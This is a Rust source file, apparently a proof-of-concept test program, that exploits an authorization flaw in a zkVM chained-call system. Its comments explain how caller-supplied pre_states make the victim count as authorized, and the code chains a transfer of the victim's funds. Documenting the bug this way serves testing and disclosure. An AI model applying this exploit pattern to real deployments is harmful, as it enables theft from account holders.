mirror of
https://github.com/logos-blockchain/lssa.git
synced 2026-05-23 01:59:44 +00:00
44 lines
1.5 KiB
Rust
44 lines
1.5 KiB
Rust
use nssa_core::program::{ChainedCall, ProgramId, ProgramInput, ProgramOutput, read_nssa_inputs};
|
|
|
|
/// Instruction: (`auth_transfer_id`, `amount`) — both primitive, safe for `risc0_zkvm::serde`.
|
|
type Instruction = (ProgramId, u128);
|
|
|
|
fn main() {
|
|
let (
|
|
ProgramInput {
|
|
self_program_id,
|
|
caller_program_id,
|
|
pre_states,
|
|
instruction: (auth_transfer_id, amount),
|
|
},
|
|
instruction_words,
|
|
) = read_nssa_inputs::<Instruction>();
|
|
|
|
// Output empty pre/post states. P2 processes no accounts itself, so the
|
|
// authorization check at validated_state_diff.rs:158-182 runs over nothing.
|
|
// Victim is never compared against caller_data.authorized_accounts = {attacker}.
|
|
//
|
|
// The bug: authorized_accounts for authenticated_transfer is built from
|
|
// chained_call.pre_states (this call's inputs, set by P1), which contains
|
|
// victim(is_authorized=true). So authorized_accounts = {victim}, and the
|
|
// subsequent check passes.
|
|
let auth_transfer_instruction =
|
|
risc0_zkvm::serde::to_vec(&authenticated_transfer_core::Instruction::Transfer { amount })
|
|
.expect("serialization is infallible");
|
|
|
|
ProgramOutput::new(
|
|
self_program_id,
|
|
caller_program_id,
|
|
instruction_words,
|
|
vec![],
|
|
vec![],
|
|
)
|
|
.with_chained_calls(vec![ChainedCall {
|
|
program_id: auth_transfer_id,
|
|
pre_states,
|
|
instruction_data: auth_transfer_instruction,
|
|
pda_seeds: vec![],
|
|
}])
|
|
.write();
|
|
}
|